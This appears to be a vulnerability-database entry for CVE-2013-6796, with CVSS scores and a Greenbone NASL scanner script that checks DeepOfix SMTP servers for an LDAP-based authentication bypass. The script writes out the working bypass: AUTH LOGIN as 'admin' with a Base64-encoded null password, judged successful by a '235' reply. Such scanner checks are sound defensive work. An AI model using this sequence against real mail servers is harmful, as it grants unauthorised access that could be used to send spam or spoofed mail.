CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:L/Au:N/C:N/I:P/A:N
AI Score
Confidence
Low
EPSS
Percentile
94.9%
DeepOfix versions 3.3 and below suffer from an SMTP server authentication
bypass vulnerability due to an LDAP issue.
# SPDX-FileCopyrightText: 2013 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.103833");
script_cve_id("CVE-2013-6796");
script_version("2023-10-31T05:06:37+0000");
script_tag(name:"cvss_base", value:"5.0");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:N/I:P/A:N");
script_tag(name:"last_modification", value:"2023-10-31 05:06:37 +0000 (Tue, 31 Oct 2023)");
script_tag(name:"creation_date", value:"2013-11-19 15:05:15 +0100 (Tue, 19 Nov 2013)");
script_name("DeepOfix SMTP Authentication Bypass");
script_category(ACT_ATTACK);
script_family("SMTP problems");
script_copyright("Copyright (C) 2013 Greenbone AG");
script_dependencies("smtpserver_detect.nasl", "check_smtp_helo.nasl");
script_require_ports("Services/smtp", 25);
script_mandatory_keys("smtp/deepofix/detected");
script_xref(name:"URL", value:"http://packetstormsecurity.com/files/124054/DeepOfix-3.3-SMTP-Authentication-Bypass.html");
script_tag(name:"impact", value:"An Attacker could login in the SMTP server knowing only the username of one user in the
server and he could sends emails. One important thing is that the user 'admin' always exists in the server.");
script_tag(name:"vuldetect", value:"Try to bypass authentication for the user 'admin'.");
script_tag(name:"insight", value:"The vulnerability allows an attacker to bypass the authentication in the SMTP server
to send emails. The problem is that the SMTP server performs authentication against
LDAP by default, and the service does not check that the password is null if this
Base64. This creates a connection 'anonymous' but with a user account without entering
the password.");
script_tag(name:"solution", value:"Ask the vendor for an Update or disable 'anonymous LDAP
bind' in your LDAP server.");
script_tag(name:"summary", value:"DeepOfix versions 3.3 and below suffer from an SMTP server authentication
bypass vulnerability due to an LDAP issue.");
script_tag(name:"affected", value:"DeepOfix 3.3 and below are vulnerable.");
script_tag(name:"solution_type", value:"Mitigation");
script_tag(name:"qod_type", value:"remote_vul");
exit(0);
}
include("smtp_func.inc");
include("misc_func.inc");
include("port_service_func.inc");
include("host_details.inc");
port = smtp_get_port(default:25);
banner = smtp_get_banner(port:port);
# e.g. '220 deepofix.local ESMTP' from the packetstorm advisory.
if(!banner || (banner !~ "^220 [^ ]+ ESMTP$" && "Powered by the new deepOfix Mail Server" >!< banner && "Welcome to deepOfix" >!< banner))
exit(0);
soc = smtp_open(port:port, data:NULL);
if(!soc)
exit(0);
src_name = this_host_name();
send(socket:soc, data:strcat('EHLO ', src_name, '\r\n'));
buf = smtp_recv_line(socket:soc, code:"250");
if(!buf) {
smtp_close(socket:soc, check_data:buf);
exit(0);
}
send(socket:soc, data:'auth login\r\n');
buf = smtp_recv_line(socket:soc);
if("334 VXNlcm5hbWU6" >!< buf) { # username:
smtp_close(socket: soc);
exit(0);
}
send(socket:soc, data:'YWRtaW4=\r\n'); # admin
buf = smtp_recv_line(socket:soc);
if("334 UGFzc3dvcmQ6" >!< buf) { # password:
smtp_close(socket:soc, check_data:buf);
exit(0);
}
send(socket:soc, data:'AA==\r\n'); # \0
buf = smtp_recv_line(socket:soc);
smtp_close(socket:soc, check_data:buf);
if("235 nice to meet you" >< buf) {
security_message(port:port);
exit(0);
}
exit(99);